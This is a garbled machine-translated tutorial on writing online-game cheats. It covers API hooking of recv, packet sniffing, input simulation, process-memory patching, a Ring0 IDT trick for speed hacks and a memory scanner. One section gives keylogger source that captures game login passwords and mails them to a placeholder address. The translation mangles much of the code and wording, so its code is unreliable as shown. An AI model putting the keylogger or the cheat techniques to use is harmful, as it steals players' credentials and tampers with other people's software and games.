PIMAGE_IMPORT_DESCRIPTOR pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR) ((DWORD) pDOSHeader (DWORD) (pNTHeader-> OptionalHeader.DataDirectory [IMAGE_DIRECTORY_ENTRY_IMPORT] .VirtualAddress)); // check the cycle according to the input through the IAT library name, such as the return address matches the IAT, Otherwise the next IAT is detected. While (PimportDesc-> Name) {// Gets the name of the input library description of the IAT. PSTR SZCURRMOD = (PSTR) (PimportDesc-> Name); if (StricsP (SZCurRMod, SzimportMod) == 0) Break; PimportDesc ;} if (pimportdesc-> name == null) Return Null; Return PimportDesc;} Add a function to locate the IAT item that is blocked the API function and modifies its content as an alternative function address. Code is as follows: extern "C" __declspec (dllexport) HookAPIByName (HMODULE hModule, LPCSTR szImportMod, LPHOOKAPI pHookApi) // wherein, hModule module handle for the process; szImportMod input library name; pHookAPI is HOOKAPI structure pointer. {// Positioning the SzimportMod Enter the IAT address in the input data segment. PIMAGE_IMPORT_DESCRIPTOR PIMPORTDESC = Locationiat (hmodule, szimportmod); if (pimportDesc == null) return false; // The first THUNK address. PIMAGE_THUNK_DATA PORIGTHUNK = (PIMAGE_THUNK_DATA) ((DWORD) HMODULE (DWORD) (PimportDesc-> OriginalFirstthun); // The first IAT term THUNK address. PIMAGE_THUNK_DATA PreAlthunk = (PIMAGE_THUNK_DATA) (PimportDesc-> firstthunk); / / loop look up the IAT item of the Armed API function and modify its value with an alternate function address. While (PORIGTHUNK-> U1.Function) {// Check this thunk is an IAT item. IF ((PORIGTHUNK-> u1.ordinal & image_ordinal_flag)! = image_ordinal_flag) {// Gets the function name described in this IAT item. PIMAGE_IMPORT_BY_NAME PBYNAME = (PIMAGE_IMPORT_BY_NAME) ((DWORD) HMODULE (DWORD) (Porage (PBYNAME-> Name [0] == '/ 0') Return False; // Detect whether it is a shutdown function.
IF (strcmpi (phookapi-> szfunc, (char *) pBYNAME-> NAME) == 0) {MEMORY_BASIC_INFORMATION MBI_THUNK; / / Query the information of the modified page. VirtualQuery (PreAlthunk, & Mbi_thunk, sizeof (memory_basic_information)); // Change the Modify Page Protection Properties is Page_Readwrite. VirtualProtect (Mbi_thunk.BaseAddress, Mbi_thunk.region, page_readwrite, & mbi_thunk.protect); // Save the original API function address. IF (PhookApi-> PoldProc == NULL) Phooki-> PoldProc = (proc) preArthunk-> u1.function; // Modify the API function IAT item as an alternative function address. PreAlthunk-> u1.function = (pdword) phookapi-> pnewproc; // Restore the modified page protection attribute. DWORD dwOldProtect; VirtualProtect (mbi_thunk.BaseAddress, mbi_thunk.RegionSize, mbi_thunk.Protect, & dwOldProtect);}} pOrigThunk ; pRealThunk ;} SetLastError (ERROR_SUCCESS); // set the error to ERROR_SUCCESS, indicating success. Return true;} (4) Defines the replacement function, which is only blocked only for the MessageBoxa and RECVs in this instance. The code is as follows: Static int WinAPI MessageBoxa1 (hwnd hwnd, lpctstr lptext, lpctstr lpcaption, uint utype) {// filter the original text and title content of the original Messageboxa, only the following is displayed. Return MessageBox (HOND, HOOK API! "," Hook API ", UTYPE);} Static Int WinAPI Recv1 (Socket S, Char Far * BUF, INT LEN, INT FLAGS) {// This can be blocked Sending network packets, you can add analysis and processing data code. RETURN RECV (S, BUF, LEN, FLAGS);} (5) Add to activate the API code in the keyboardproc function, add the following ELSE if statement in the if (wparam == 0x79) statement: ...... // Start the blocking API function function when the F11 key is activated. Else if (wparam == 0x7a) {hookapi API [2]; API [0] .szfunc = "messageboxa"; // Set the name of the block being blocked. API [0] .pnewProc = (proc) messageboxa1; // Set the address of the replacement function. API [1] .szfunc = "rv"; // Set the name of the block of the block. API [1] .pnewProc = (proc) RECV1; // Set the address of the replacement function. / / Set the MessageBoxa function in the blocking user32.dll library.
HookapibyName (GetModuleHandle (NULL), "User32.dll", & API [0]); // sets the RECV function in the blocking WSOCK32.DLL library. Hookapibyname (GetModuleHandle (NULL), "WSOCK32.DLL", & API [1]);} ... (6) Add header file declaration in ActiveKey.cpp "#include" wsock32.h ". From" Project "Select" Settings "in the menu, pop up the Project Setting dialog, select the Link tab, enter WS2_32..Lib. (7) in Object / Library Module, Enter WS2_32..LIB. (7) Reconfate the ActiveKey project, generate an activeKey.dll file, copy it to SIMULATE.EXE directory. Run Simulate.exe and start the global hook. Activate any application, press the F11 key, run this program to call the MessageBoxa function, see if it is changed. Similarly, In receiving the network packet, you can implement the package function. Sixth, in addition to the techniques commonly used in several game plug-in programs, in additional procedures, the game data modification technology, game acceleration technology, etc. are In the article, it will be introduced in an article. Online game plug-in core package reveals the online game package technology is one of the concerns of most programming enthusiasts, let us study this question together here. Don't look at this is the problem of packet, but the technology covered by the technique is a wide range of ways. Many ways to achieve (for example, APIHOOK, VXD, Winsock2 can be achieved), where we cannot meet each technology and method, So I will explain in detail in Winsock2 technology, even if I don't understand the brick. Because most readers are not very well understood, I will briefly introduce related knowledge here: APIHOOK: Since Windows provides the function of the kernel to package the kernel In the API, everyone must implement the function to pass the API. In other words, we must capture the data packet, you must know and capture this API, get a package information from the API. VXD: Directly pass the VXD driver To realize the capture of the package information, but VXD can only be used for Win9x. Winsock2: Winsock is a Windows network programming interface, Winsock works in the application layer, which provides high-level data transfer programming interface with the underlying transport protocol, Winsock2 is Winsock 2.0 The service provider interface, but can only be used in Win2000. Well, let's start entering Winsock2 blocking programming. In the package programming, I am ready to explain two steps: 1. Capture of the package, 2, package Send. First of all, we must implement It is the capture of the package: the winSock of Delphi is 1.0, very natural Winsock2 is not used. If you want to use Winsock2, we have to make an interface to Winsock2 in Delphi, you can use Winsock2. 1. How do I do WINSOCK2 interface? 1) We must first define the type used by Winsock 2.0, where we do a demonstration in the WSA_DATA type, you can give a three-to-use package to implement Winsock2.
We must know that the WSA_Data type will be used for WSAStartup (WSData: TWSADATA): Integer;, you will find that WSDATA is a reference parameter. In the incoming parameter, the number of variables is the address of the variable, so we do the following for WSA_DATA. package: const WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; type PWSA_DATA = ^ TWSA_DATA; WSA_DATA = record wVersion: Word; wHighVersion: Word; szDescription: array [0..WSADESCRIPTION_LEN] of Char; szSystemStatus: array [0..WSASYS_STATUS_LEN] of char; iMaxSockets: Word; iMaxUdpDg: Word; lpVendorInfo: PChar; end; TWSA_DATA = WSA_DATA; 2) we need to introduce WS2_32.DLL function winsock2, and we are also here to make an example WSAStartup function introduction: function WSAStartup (wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; implementation const WinSocket2 = 'WS2_32.DLL'; function WSAStartup; external winsocket name 'WSAStartup'; by the above method, we can do winsock2 interface, here we can use winsock2 It's a packet capture, but you must have a network card. Because we involve a security problem that is working, we are here as an IP packet as an example, if you are not very clear, please check MSDN: 1) We want to boot WSA, this when a use to WSAStartup function, used as follows: INTEGER WSAStartup (wVersionRequired: word, WSData: TWSA_DATA); 2) obtained using the socket function socket handle, m_hSocket: = socket (AF_INET, SOCK_RAW, IPPROTO_IP); used as follows: INTEGER socket (AF: INTEGER, STRUCT: INTEGER, Protocol: integer; m_hsocket: = socket (AF_INET, SOCK_RAW, IPPROTO_IP); M_HSocket is the Socket handle, AF_INET, SOCK_RAW, IPPROTO_IP constant.
3) Define the SOCK_ADDR type, with our network card IP to the SOCK_ADDR type, then we use the bind function to bind our NIC, the Bind function is as follows: type in_addr = record s_addr: pchar; end; type tsock_addr = record sin_family : Word; sin_port: Word; sin_addr: IN_ADDRsin_zero: array [0..7] of Char; End; varLocalAddr: TSOCK_ADDR; LocalAddr.sin_family: = AF_INET; LocalAddr.sin_port: = 0; LocalAddr.sin_addr.S_addr: = inet_addr ( '192.168.1.1'); // Here your own network card IP address, and inet_addr this function is a function of Winsock2. bind (m_hSocket, LocalAddr, sizeof (LocalAddr)); 4) with WSAIoctl to register the input-output component WSA, which is used as follows: INTEGER WSAIoctl (s: INTEGER, dwIoControlCode: INTEGER, lpvInBuffer: INTEGER, cbInBuffer: INTEGER, lpvOutBuffer: INTEGER , CBoutBuffer: Integer, INTEGER, LPOVERLAPPED: Integer, LPCompletionRoutine: Integer; 5) The next time the cycle is done in the dead circulation block to achieve the data reception. However, the middle of the ring should be delayed in Sleep (), otherwise the program will be wrong. 6) In the circulation block, use the RECV function to receive data, the RECV function is as follows: Integer Recv (S: Integer, Buffer: array [0..4095] of Byte, Length: Integer, Flags: integer,); 7) In Buffer is the data we receive, if we want to know where the data is sent, then we want to define a certain IP package structure, use copymemory () to read the IP information from buffer, However, it is read out that hexadecimal data needs to be converted. I looked at the package captured, it was a little start, but I have to tell you that the package is very easy, but many game packages are encrypted, if you want to figure out What is what you need to packet decryption. Four online game plug-in design methods I saw someone else playing online games, I was uncomfortable for the programmer, I would like to figure out what is going on. I took some to study, I have a personal experience, and I will share it with everyone. I don't have a few more ways (according to the difficulty of production): 1, action, so-called action, means using the API send command to the window or API control Mouse, keyboard, etc., so that the characters in the game flow or attack, the earliest "stone" plug-in is this way.
(This plug-in is entirely garbage, TMD, as long as people who will know some API know what to do, but this plug-in is also entrance-level good stuff, although you can't improve your combat power, but you can improve your morale) 2 Local modification, this plug-in has some of the traditional game modifiers, doing this plug-in programming only a little understanding of the memory address and master the API can be realized, "Elf" is this way. Written, it is difficult to find those address code, find the address, usually to use the tools of others, some games have two-code check, is looking for more difficult. (This plug-in is more difficult than the previous one, but this plug-in can be used, it is also difficult ~~, this plug-in can quickly improve your understanding and application of memory address, it is you The programming technology is a good Dongdong) 3, Trojan, this plug-in purpose is to help the plug-in producer to steal the user's password (TMD, "bad" is a word, but you have to know that it is known to talk about it ~ ~), Doing this plug-in, there is a certain difficulty, you need hook or keyboard monitoring technology to make a foundation can be done, its principle is first cutting the user's account or password, and then send it to the specified mailbox. (I have written such a stuff before, but I have never used it. I know that this kind of Dongdong is very unethical, so don't use it in the future!) 4, accelerate, this plug-in can speed up the speed of the game ... (I am sorry for everyone, I don't actually have done it, so I can't be self-suited, I'm embarrassed, the first three can be better implemented in languages such as VB, Delphi, and then use VC. The next layer supports a better programming tool. The action plug-in first, first talk about the plug-in plug-in, which is the easiest way to do when I first write.
I remember that I was still in the "Stone" era, I saw that someone hang a software (plug-in), I could go four outsight (I didn't know how to hang it outside), so I found this software ( After taking it, I listened to someone to say this. This is not difficult to realize it. It is not difficult to realize it. It is not difficult to see that in fact the people's walking is not the mouse, and it will be achieved. The impulsive impulsive, then ran to the MSDN and see some information, found this kind of function, only a few simple API functions can be done: 1, first we have to know the position of the mouse (for easy reducing now The location of the mouse is to use the API function getCursorpos, which uses the following: BOOL getCursorpos (LPPoint LPPOINT / / Address of Structure for Cursor Position; 2, we move the position of the mouse to the person On the place, we will use the setcursorpos function to move the mouse position, which is used as follows: BOOL setCursorpos (int X, // horizontal position int y // vertical position); 3, the analog mouse issues a button to press and release We want to use the mouse_event function to implement, use the method of use Next: void mouse_event (DWORD DWFLAGS, // Flags Specifying Various Motion / CLICK VARIANTSDWORD DX, // Horizontal Mouse Position Or Position ChangedWord Dy, // Vertical Mouse Position OR position changeDWORD dwData, // amount of wheel movementDWORD dwExtraInfo // 32 bits of application-defined information); dwFlags in its place, many of the available events such as mobile MOUSEEVENTF_MOVE, left button down MOUSEEVENTF_LEFTDOWN, left release MOUSEEVENTF_LEFTUP, specific Dongdong still checks MSDN ~~~~~ Ok, with the previous knowledge, we can come and see how the characters are removed: getCursorpos (Point); setcursorpos Ranpoint (80, Windowx), Ranpoint (80, Windowy)); // Ranpoint is a homemade random coordinate function mouse_event (MouseEventf_leftdown, 0,0,0,0); mouse_event (MouseEventf_leftup, 0,0,0,0); SetCursorpos (POINT.X, POINT.Y); Look at the above code, is it very simple to see the characters? ~~ Said, TMD, this is the practice of garbage, I believe it ~~~), next, then look at the automatic attacking practice in the game (required to attack the shortcut button in the game), the truth is still the same, just The API is different ~~~, this time we want to use the keybd_event function, the usage is as follows:
VOID keybd_event (BYTE bVk, // virtual-key codeBYTE bScan, // hardware scan codeDWORD dwFlags, // flags specifying various function optionsDWORD dwExtraInfo // additional data associated with keystroke); we have to know the scan code can not be used directly to Use the function mappvirtualkey to turn the key value to the scanning code, the specific usage of MapVirtualKey is as follows: uint mapvirtualkey (uint ucode, // virtual-key code or scan code umaptype // translation to perform); Ok, ratio said fast button Is Ctrl A, let us see how the actual code is written: keybd_event (vk_control, mapvirtualkey (vk_control, 0), 0, 0); keybd_event (65, MapVirtualKey (65, 0), 0, 0); KeyBD_EVENT (65, MapVirtualKey (65, 0), keyeventf_keyup, 0); keybd_event (vk_control, mapvirtualkey (vk_control, 0), keyeventf_keyup, 0); first analog to press the CTRL button, then simulate the A key, then simulate Open the A key, finally release the Ctrl key, which is a cycle that simulates the shortcut. (Seeing this, almost a certain understanding of the simple exterior ~~~~ Do you try? If you give an imitation, you can have a better Dongdong, this is going to see your comprehension. ~~, but don't be happy too early this, there is a more complex Dongdong waiting for you ~~) Local modified plug-in now, let's take a look, more plug-in plug-in - local modification The entire production process of type hanged is detailed.
I know that the most typical application of local modified plug-in is to play on the "Elf" game, because I am in recent years ("Elf" is still in the test stage), there are many colleagues in my company to play "Elf". So I looked at the data processing method of the game. I found that the information it sent to the server was existing in memory (I got the first feeling: Modifying this game and modifying the stand-alone version of the game. In other words, it was possible to modify the memory address before he submitted information to the server). At that time, I found that the address was changed, and sure, according to my idea, modified the address, so that the system was automatically submitted, it really succeeded. ~~~~~, later "Elf" changed to a double address school inspection, memory school inspection, etc., I will not have nonsense here ~~~~, ok, let's take a look at how this kind of plunks are made We have to have a specific understanding of Windows's memory before doing plug-in, and the memory we refers to the system's memory offset, which is relatively memory, and we have to modify it, then we To understand several Windows APIs, OK, follow examples Let us see this plug-in production and API application (in order to ensure the normal operation of online games, I don't explain the way the memory address is detailed): 1 First, we must use FindWindow, know the handle of the game window, because we have to know the ID of the process after the game is run, below is the usage of FindWindow: hWnd FindWindow (lpctstr lpClassName, // Pointer to class namelpctstr lpwindowname // pointer to window name); 2, we obtained GetWindowThreadProcessId game process corresponding to the window process ID, the function is used as follows: DWORD GetWindowThreadProcessId (HWND hWnd, // handle of windowLPDWORD lpdwProcessId // address of variable for process identifier); 3, to give After the game process ID, the next thing is to open the process with the highest permissions, the specific usage of the function OpenProcess used is as follows: Handle OpenProcess (DWORD DWDESIREDACCESS, // Access Flag Bool Binherithandle, // Handle Inheritance Flag DWord DWProcessid //// Process i Dentifier; at the dwdesiredAccess is where you have access mode, there are many permissions, we use as long as you use process_all_access to open your progress, and other ways we can check MSDN.
4, after opening the process, we can use the function to operate, here we use WriteProcessMemory to write data to the memory address (other way of operation, such as: ReadProcessMemory, I am here. introduced a), we look at WriteProcessMemory usage: BOOL WriteProcessMemory (hANDLE hProcess, // handle to process whose memory is written to LPVOID lpBaseAddress, // address to start writing to LPVOID lpBuffer, // pointer to buffer to write data toDWORD nsize, // Number of bytes to Writelpdword LPNUMBEROFBYTESWRITEN // Actual Number Of Bytes Written; 5, the following is done with CloseHandle Close process handle.
This is a method of implementing some of this type of game, well, there is this method, we have a rational understanding, let's take a look at the actual example, improve our sense of mind, the following is the plug-in XX game code, we correspond according to the above method to look at it: constResourceOffset: dword = $ 004219F4; resource: dword = 3113226621; ResourceOffset1: dword = $ 004219F8; resource1: dword = 1940000000; ResourceOffset2: dword = $ 0043FA50; resource2: dword = 1280185; ResourceOffset3: dword = $ 0043FA54; resource3: dword = 3163064576; ResourceOffset4: dword = $ 0043FA58; resource4: dword = 2298478592; varhw: HWND; pid: dword; h: THandle; tt: Cardinal; beginhw: = FindWindow ( ' XX ', nil); if hw = 0 thenExit; GetWindowThreadProcessId (hw, @pid); h: = OpenProcess (PROCESS_ALL_ACCESS, false, pid); if h = 0 thenExit; if flatcheckbox1.Checked = true thenbeginWriteProcessMemory (h, Pointer ( ResourceOffset), @Resource, sizeof (Resource), tt); WriteProcessMemory (h, Pointer (ResourceOffset1), @ Resource1, sizeof (Resource1), tt); end; if flatcheckbox2.Checked = true thenbeginWriteProcessMemory (h, Pointer (ResourceOffset2) , @ Resource2, sizeof (resource2), tt); WriteProcessMemory (H, Pointer (resourceoffset3), @reso Urce3, sizeof (resource3), tt); WriteProcessMemory (h, pointer (resourceoffset4), @ resource4, sizeof (resource4), tt); end; messagebeep (0); CloseHandle (h); close; this game is used The address verified the data to be submitted, so this type of game plug-in production is not very difficult, and it is hard to find these addresses. Trojan plug-in roof plug-in, maybe mostly like Trojans, is the Southam Side East that helps do plug-in accounts and passwords. Because there is such an external existence on the network, I have to say today (I personally hate this plug-in, please see this technology, thank you for your cooperation). To do this plug-in program implementation method (such as Hook, Keyboard Monitoring and other technologies), because Hook technology is relatively high for programmers and needs more dynamic link libraries in practical applications, I will take them in the text. Keyboard monitoring technology to achieve this type of Trojan. Keyboard monitoring technology only needs one .exe file to achieve background keyboard monitoring, this program is more suitable for this technology.
We must understand the idea of the program before making a program: 1. Let's first know that you want to record the name of the login window. 2. Judging whether the login window appears. 3. If the login window appears, log the keyboard. 4. When the window is closed, the record information is sent to the programmer's mailbox. I don't have a specific analysis of the first point, because you have to know what game you play, what is the name of the login window. From the second point, let's start this type of plug-in program implementation: So how do we judge whether the login window does not appear? In fact, this is very simple, we can easily implement it with the FindWindow function: hWnd FindWindow (lpctstr lpclassname, // pointer to class namelpctstr lpwindowname // Pointer to window name); actual program implementation, we have to find the 'XX' window , Use FindWindow (NIL, 'XX') if the window has appeared when the return value is greater than 0, then we can record the keyboard information. First song we use SetWindowsHookEx set up monitoring logs, and usage of this function is as follows: HHOOK SetWindowsHookEx (int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of Thread to install hook for; here to explain here, we have to do this for HookProc here, and Hinstance here, you can use this program's Hinstance, and the specific implementation method is: hHook: = SetWindowsHookEx (WH_JOURNALRECORD, HookProc, hInstance, 0); and HOOKPROC will function in a little more complex: function HookProc (iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; begin if findedtitle then file : // If you find the window Begin if (PEVENTMSG (LPARAM) ^. Message = WM_KEYDOWN) THEN FILE: // Message is equal to the keyboard Press HookKey: = HookKey Form1.KeyHOKRESULT (PEVENTMSG (LPARAM) ^. Paraml, Peventmsg (LPARAM ) ^. paramh; file: // Take KeyHOKRESULT (Customized function, the main function is the message parameter of the conversion interception is the button name. I will convert the conversion function in the article. If Length> 0 THEN FILE: // If you get the key name begin write (hookkeyfile, hookkey); file: // write the button name to the text file hookkey: = '; end; end; end; or more is record The entire process of the keyboard, simple, if you record it, don't forget to release it, UnHookWindowshookex (HHOOK), and hHOOK, the handle returned after setting SetWindowsHookex. We have got a record of the keyboard, so now, just send the recorded information back, we have caused it.
Other sends this piece is not very difficult, just read the record from the text file, I will send it to the email component comes with Delphi. The code is as follows: assignfile (readfile, 'hook.txt'); file: // Open hook.txt This text file reset (READFILE); file: // Set to a way to read how much not Eof (readfile) Do File: / / When you do not read the file tail becom readln (readfile, s, j); file: // read file line body: = body s; end; firly closefile; file: // Turn file end; nmsmtp1. EncodeType: = UUMIME; File: // Set the encoded nmsmtp1.postMessage.attachments.text: = '; file: // Set attachment nmsmtp1.postMessage.Fromaddress: =' xxx@xxx.com '; file: // Set source Email address nmsmtp1.postMSMTMTP1.TEXT: = 'xxx@xxx.com'; / set target email address nmsmtp1.postMessage.body.text: = 'password' '' body; file: // Set mail content NMSMTP1 .PostMessage.subject: = 'password'; file: // Setting the message title nmsmtp1.sendmail; file: // Sending the mail This program has been implemented, edited. Try. Accelerated plug-in, I have always thought that acceleration plug-in is written for a game. Later, I found that this concept is wrong. The so-called accelerated plug is actually the purpose of modifying clock frequencies to accelerate. In the past DOS era, people played programming immediately thought that this is very simple, it is not to change the 8253 register. This may be able to travel in the previous DOS era, but Windows is not.
Windows is a 32-bit operating system. It is not what you want to change (Microsoft's stuff is so domineering, say no change to you), but it is not impossible, we can Implementation by two methods: The first is to write a hardware driver, the second is to implement it with RING0 (this method is the author of CIH Chen Yinghao first, its principle is to modify the IDE table -> Create an interrupt Door -> Enter Ring0-> Call the interrupt modification vector, but there is no way to implement this * _ *, as a senior language user!), Use the first method to trouble, so we Here, use the second method to implement it ~~~ We will take a look before implementation: 1, we must first write a process to embed the assembly language in this process to implement the IDE table, create interrupt gate, modify vector Waiting for work 2, call this process to achieve acceleration function, now there is, we will explain it while watching the code: First we build a process, this process is the core part of this program: Procedure String (Value: Word ); stdcall; const zdh = $ 03; // set a interrupt number Varidt: array [0..5] of byte; // Save the IDT table OG: DWORD; // Store the old vector beginasmpush EBXSIDT IDT // Read Interrupt Description Frame MOV EBX, DWORD PTR [IDT 2] // IDT Subterite Add EBX, 8 * ZDH // Calculation Interrupt in the Interrupt Descriptor Table CLI // Off MOV DX, WORD PTR [EBX 6 ] SHL EDX, 16D MOV DX, WORD PTR [EBX] MOV [OG], EDX MOV EAX, OFFSET @@ Ring0 // Points to Ring0 Grade Dip MOV Word PTR [EBX], AX / / Low 16-bit, saved in 1 2-bit SHR EAX, 16DMOV WORD PTR [EBX 6], AX // High 16-bit, saved in 6, 7-bit int zdh // interrupt MOV EBX, DWORD PTR [IDT 2] // Reposition Add EBX, 8 * ZDHMOV EDX, [OG] MOV WORD PTR [EBX], DXSHR EDX, 16DMOV WORD PTR [EBX 6], DX // Recovered Vector Pop ebxjmp @@ EXISM / / EXITASM @@ ring0: // Ring0, this is also Is the most core Dongdong MOV Al, $ 34 // Write 8253 Control Register OUT $ 43, Almov AX, Value // Write Time Value OUT $ 40, Al // Write Value Low MOV Al, AHOUT $ 40, Al / / Write time value high IRETD // Return @@ EXITASM: End; end; the most core thing has been finished, most readers know it, I don't know how it happened, huh, huh, but I don't know how it happened.
Let's try to use this process to do a place similar to the "shifting gear"! Put a window first, put a TRACKBAR control on the window to set it to 20, MIN is set to 1, set the position to 10, write on this control: INTSTR (1742 (10-trackbar1 .Position * 160))))))))))))) The default value of Windows is $ 1742, so we use the 1742 as the base, but because the value is, the faster, the thoroughness is, so, write such a formula, ok, this Is a Delphi ASM version of "shifting gear" (only for Win9x), huh, trial, this will help you will be big, huh, huh. In Win2000, we can't achieve it directly, Ring0 is also lost, and some people will think that we can write drivers to complete, but here I tell you, Windows2000 drivers are not a VXD It can be realized, like my low hand does not write the drive WDM used by Windows, there is no way, I only have a good implementation, Prottalk is a good device driver, which is very convenient to achieve low-level ports. Operation, thereby achieving acceleration plugging. 1. Let's first have the next porttalk driver, his official website is http://www.beyondlogic.org 2, we have to copy the protttalk.sys inside. 3. Create a protalk.sys interface (I want to be omitted, you can go at http://www.freewebs.com/liuyue/port "file yourself) 4, achieve acceleration plug-in. Let's talk about this process, if you use Prottalk to operate port, it is easy to operate more than Win98. 1. Create a new project to copy the interface files and protalk.sys to the folder saved by the project file. 2, we join our newly built project Useswindows, Prottalk ... 3, we create a process Procedure String (Value: Word); Beginif Not OpenPorttalk Then Exit; Outportb ($ 43, $ 34); Outportb ($ 40, LO (Value); Outprotb ($ 40, hi (value)); ClosePostTalk; End; 4, first plus a window, put a trackbar control on the window to set it to 20, MIN is set to 1, set the position to 10. Write on this control of the Change Event: INTSTR (1742 (10-trackbar1.position) * 160)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Online game plugging in memory, many games are now stored in memory cells, then we only need to modify the specific memory value to modify the properties in the game, and many online games are not outside. Once upon a time, some online games can also be modified by memory. Later, after these games change a single memory address into multi-memory address check, increase the modification, but still can be cracked by memory analyzers. . Software such as "FPE" provides a certain memory analysis function. "FPE" is based on the leader in memory, and is a household name game modification software. Many similar software are imitating "FPE" to get the player's recognition.
The techniques of "FPE" are not open now, many people can only achieve similar plug-in by guessing the implementation of "FPE". The author has also imitated "FPE" to achieve corresponding functions, such as "Memory Modification", "Memory Query" and other technologies. This technology will be analyzed later. Since you have to do memory plug-in, you must have aware of Windows's memory mechanism. Computer's memory (RAM) is always insufficient. In the operating system, there is a physical memory and virtual memory score, because the program created in the physical memory is changed, so when it gets the game properties, do not Ability to access physical memory addresses directly. In V86 mode, the segment register use is the same as the real mode, then the linear address can be obtained by adding 4 digits by the value of the segment register to obtain the address offset, and the program is created in the linear address in the middle address 4MB-2GB A address, the properties in the game are placed here. In Windows, the virtual memory block is called page, and each page is 4KB, when reading the game properties when accessing the memory, it is best to access a page in order to do not destroy the data integrity. When operating the process memory, no need to use the assembly language, and the API of the access process memory space is provided in Windows, and the process memory can be operated directly. However, beginners generally can't grasp this technology. In order to make the beginners can operate in memory, the memory-based plug-in, the author has encapsulated some memory operations and some memory operation logic, and the control is provided to the initial scholar. The control is called: MPMEMCTL. Beginner When using this control, you must install the plug-in engine control package (in each article, the external engine control package only provides the control control corresponding to this article), the specific control installation method, please refer to the "Delphi Guide", Due to the limited space limit, it will not be available in detail. After the engine installation is complete, you can find the [MP GameControls] control group in the component column in Delphi, where the [MPMEMCTL] control can be found. Beginners can use this control to control the memory. First, get the process handle needs to operate game memory, then you must first confirm the game you want to operate, and the game program has a unique handle every process generated at runtime. There are three ways to get the handle using the control: 1. Open the program via the control to get the handle. In the control, a StartProgram method is provided. By this method, you can open the program to get the process handle, and process information can be returned. PPROCICINFO: process_information; mpMemctl.StartProgram (filepath: string; // Program path VAR APROC_INFO: Process_information // Process information): Boolean This method provides two parameters, the first parameter is the program path to open, the second parameter The process information of the process created after the program is opened. Using this method, the process information is obtained, and the control's prochandle property is added, and you can use the control to read and write the memory process directly. Its application examples are as follows: var pprocinfo: process_information; begin mpmemctl1.startprogram (edit1.text, pprocinfo), by the control according to the program name. In the control, there is also a corresponding description of the system running process, and the control provides two methods for obtaining the corresponding process handle according to the program name. GetProcids () can get the name list of all programs that the system is now running. getProcid () can get the handle of the corresponding process by running the program name.
getProcids (): Tstrings // Return to Multi-Bank Chart GetProcid (APROCNAME: STRING // Application Name): THANDLE; / / Application Procedure Handle Its application instance is as follows: First, you can pass GetProcids () and parameter list Returns ComboBox1.items: ComboBox1.items: = mpMemctL1.GetProcids (); then you can get the corresponding process handle with getProcid (), and give the control's prochandle attribute, you can use the control directly Read and write the memory process. MPMemctL1.GetProcid (ComboBoX1.Text) 3, by the control according to the window name. In the control, the control provides two methods for obtaining the corresponding process handle based on the window name. You can get all windows running in the process via getAllWindow (). getWinProchandle () can get the handle of the corresponding process by the corresponding window name. GetAllWindow (AHANDLE: THANDLE / / Handle): Tstrings; // Returns the name getWinProchandle (awindowname: String // to the current window name): THANDE; / / Return to the handle of the window Examples: First, you can return to ComboBox1.Items by getAllWindow () and put the parameter list: ComboBox1.Items: = mpMemctL1. GetAllWindow (Handle); then you can get the corresponding process handle, and give the control of the control ProChandle The handle) attribute is added, and you can use the control to read and write the memory process directly. MPMemctL1. GetWinProchandle (ComboBoX1.text); Second, the game is suspended in the program, in order to facilitate better get the current attribute of the game. The game pause method is provided in the control. Just call the method, the game can be freely suspended or started. This method is: PauseProc () PauseProc (Atype: Integer // Control Type) Control Type can only be passed to parameter 0 or 1,0 representative to pause the game, 1 means cancel pause. Its application examples are as follows: mpMemctl1.pauseproc (0); // Pause Game MPMEMCTL1.PAUSEPROC (1); // Restore Pause III, read and write memory value game properties actually stored in memory address value, to learn or modify games in the game Attributes can be done by read or write to memory values. Through the control, it is easy to read and write the memory address value. You can confirm that the method is to be added to the prochandle property by calling the getaddressValue () and setaddressValue () of the control. The method given to the prochandle attribute, which has been described above. Whether it is read or written on the memory value, it is necessary to clarify the memory address to operate. GetDressValue (// Read Memory Method Aaddress: Pointer; // Operation Memory Address VAR Avalue: Integer // Read Value): Boolean; SetAddressValue (// Write Memory Method Aaddress: Pointer; // Operation Memory Address Avalue: Integer // Write the value): Boolean; Be noted that the memory address must be the Pointer type when passing into the memory address.
Its application examples are as follows: read address values (if the "protagonist" level is 4549632): var Avalue: integer; begin mpmemctl1.getaddressValue (Pointer ('4549632'), avalue; value in Avalue variable The value of memory address [4549632]. Write address value: mpMemctL1.SetaddressValue (Pointer), strthannel (87)); can change the memory address value to be modified to 87 by this method, that is, change the "protagonal" level to 87. 4. Memory address value analysis In the game, you want to go to the memory address stored by the game properties, then the corresponding memory address is modeled, and the number of game properties stored will be available after analysis. The control provides two analytical methods based on memory addresses. One is to search according to the precise address value, and the other is to search according to the amount of memory changes. 1. If it is clearly known that the current value of the currently wants to modify, then use the exact address value to search and analyze in the game, you need to modify the experience of the person, then you must first get experience information from the game screen, such as the game character. The current experience value is 9800, you need to increase the empirical value, then you need to get the corresponding memory address in memory at this time, of course, it is likely that the address value is 9800 in memory, the first time is likely Searched the address of several address values to 9800. Waiting for the empirical value and change, if you change from 9800 to 20000, you can search again, then from the address just searched, you can further get a few more memory addresses, so on, then you can finally experience The address of the specific stored address. If you want to use a control to implement the memory value, it is very simple, and it is easy to call the Search () method of the control. However, to confirm the scope of the search before search, as mentioned above: "The program is now created in the linear address of 4MB-2GB of address", so the address to search should be between 4MB-2GB, so Set the control's MaxAddress property to 2GB, set the control's MinadDress property to 4MB. There is also a value that needs to be confirmed is the value you need to search, so you should set the SearchValue property to the current search value. If you need to display a search schedule, you can hang a corresponding TGAUGE control (the control is schedule control). Search (isfirst: boolean // is the first search): Boolean In order to improve search efficiency, implement business logic, then you need to pass a parameter, confirming whether it is the first time memory. Its application examples are as follows: maxv: = 1024 * 1024 * 1024; Maxv: = 2 * maxv; minv: = 4 * 1024 * 1024; v: = strt (edit1.text); with mpmemctl1 dobegin maxaddress: = maxv; minaddress: = minv; searchValue: = seaarchv; showgauge: = gauge1; search (first) end; if first the first: = false; 2, if you don't clearly want to modify the address value, you only know that the value you want to modify is large or It is made smaller, then the search is based on the amount of memory changes. If some games have no blood value, it is necessary to modify the blood value of the characters, then search for the number of blood value storage of the character is analyzed by means of the amount of memory increase or decrease.
